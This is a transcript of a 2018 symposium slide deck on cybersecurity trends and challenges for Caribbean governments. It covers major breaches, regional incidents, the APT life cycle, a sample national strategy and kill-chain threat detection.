cybersecurity: trends and challenges trends and challenges ... monetization state-sponsored...

20
The better the question. The better the answer . The bett er the world works. Cybersecurity: Trends and Challenges 21 st Century Government – City Next Antigua 2018 Symposium

Upload: vannguyet

Post on 18-May-2018

225 views

Category:

Documents


0 download

TRANSCRIPT

The better the question. The better the answer�.The better the world works.

Cybersecurity: Trends and Challenges

21st Century Government – City Next Antigua 2018 Symposium

Page 2

“I get hired to hack into computers now and

sometimes it's actually easier than it was years

ago.”

-- Kevin Mitnick

Page 3

The BEST hacking tool today!

Page 4

Things are not always what they seem

Page 5

Fraud through technology – real example

Original Invoice

Fraudulent Invoice

Page 6

Some breaches you may know

Equifax - 145 million people

July 2017

NSA spy tools

leaked to internet …

April 2017

Yahoo -1B accounts hacked

2013/2014/2016/2017

50TB of NSA data stolen

over 20 years…

Cryptocurrency Miner …

compromized (60M)

Dec 2017

Uber – 57M customer records

breached… 2016

Swift hack –81M missing (attempted

850M) … 2016

Thousands of voter role

records were accessed

Sep 2016

Ransomware/WannaCry-

300,000

computers…May 2016

Ransomware

infects 400,000

computers 2017

Page 7

Attacks on Industrial Control Systems – Operational Technology

Shamoon

Flame

Page 8

The cyber threat landscape

ENISA Threat Landscape Report 2017

Page 9

Why

► Attackers are increasingly making use of tools already installed on targeted

computers, like PowerShell, PSExec, or WMI

► Minimizes the risk of an attack being blocked

► Less chance of being detected by traditional security tools

► Running simple scripts and shellcode directly in memory.

► Hide in plain sight

► Clickless infections

Page 10

Complexity of threats

Unsophisticated

attackers (script

kiddies)

You are on the internet and have

vulnerability.

Sophisticated

attackers (hackers)

You are on the internetand have information of

value.

Corporate espionage(insider)

Current or former employeeseeks gain from selling

intellectual property (IP).

State-sponsored attacks Advanced persistent

threat (APT)

You are targeted because of who you are,what you do, or the value of your IP.

Ris

k

Attacker resource and sophistication

Monetization

State-sponsored espionage

Experimentation

Corporate espionageInitial

exploitationData

exfiltration

Intelligence

gathering

Command

and control

Privilege

escalation

APT life cycle

Page 11

Closer to home

Trinidad news media group

website hacked …

2016

Thousands of credit cards

hacked

(Bahamas)… 2013

Government Minster SM

account hacked …

2016

Four state bodies hacked in two weeks (Jamaica)…

Feb 2016

Militant group hacks Gov’t of St. Vincent’s website …

2015

Bank account thefts over Christmas

period2015

Regional Telecom. provider

hacked … 2013

Six government

websites compromized

2015

Page 12

National cybersecurity posture – technologies

Source: 2016 Cybersecurity Report, OAS

Page 13Source: 2016 Cybersecurity Report, OAS

Page 14

The cybersecurity framework

!

! !

!

!

! !

!

!

!

!

!

National Cybersecurity Strategy (SAMPLE)

• PROTECT CRITICAL

INFRASTRUCTURE

• DEVELOP HUMAN CAPITAL

• COOPERATE WITH PARTNERS

• DEFEND & RESPOND

• IMPROVE THREAT AWARENESS

• DEVELOP TECHNICAL

CAPABILITIES

• PROTECT CRITICAL

INFRASTRUCTURE

• DEVELOP HUMAN CAPITAL

• COOPERATE WITH PARTNERS

• DEFEND & RESPOND

• IMPROVE THREAT AWARENESS

• DEVELOP TECHNICAL

CAPABILITIES

FOCUS

POLICY

• Entity 1

• Entity 2

• Entity

• Etc.

ENTITYSECTOR

GOVERNANCE

STANDARDS

INFORMATION

• Health

• Transport

• Oil & Gas

• Financial

• Etc.

Information Assurance

Technical Forums

National Incident

Response

Working Group

National Awareness &

Capability Building

Committee

National Policy

Working Group

Public Sector Cybersecurity Strategy (SAMPLE)

Page 16

Mission: Comprehensive operational anomaly detection throughout the kill chain

Threat detection

Attack (Kill) chain progression

Background research

Steal dataInitial attackEstablishfoothold

Enablepersistence

Enterprise recon

Move laterally

Escalate privilege

Gather and encrypt data

Detection that email is malicious

Detection that communication with

attacker exists

Detection that programs or services are malicious

Detection that reconnaissance behavior exists

Detection that traversal behavior exists

Detection that staging behavior exists

Detection that privilege escalation behavior exists

Detection that exfiltration

behavior exists

Page 17

What the next generation of tools look like

Vendor Network

Internal

reconnaissance

La

tera

l M

ov

em

en

t

HVA Interconnect

HVA devices

►Self-learning models on each pair of communicating nodes

►Use cases covered:

►Lateral detection

►Reconnaissance detection

►Data Staging detection

►Can be tuned to be sensitive to most pressing threats including

►High Value Assets (HVA)

► Insider threat

►External attackers

►Operational Technology

► IoT monitoring

►3rd party vectors

►POS, etc

Highlights

‘PathScan’ detects attacks across interconnected networks

Page 18

PathScan visual and demonstration

Questions/Comments

Page 20

“By changing nothing,

nothing changes”

-Tony Robbins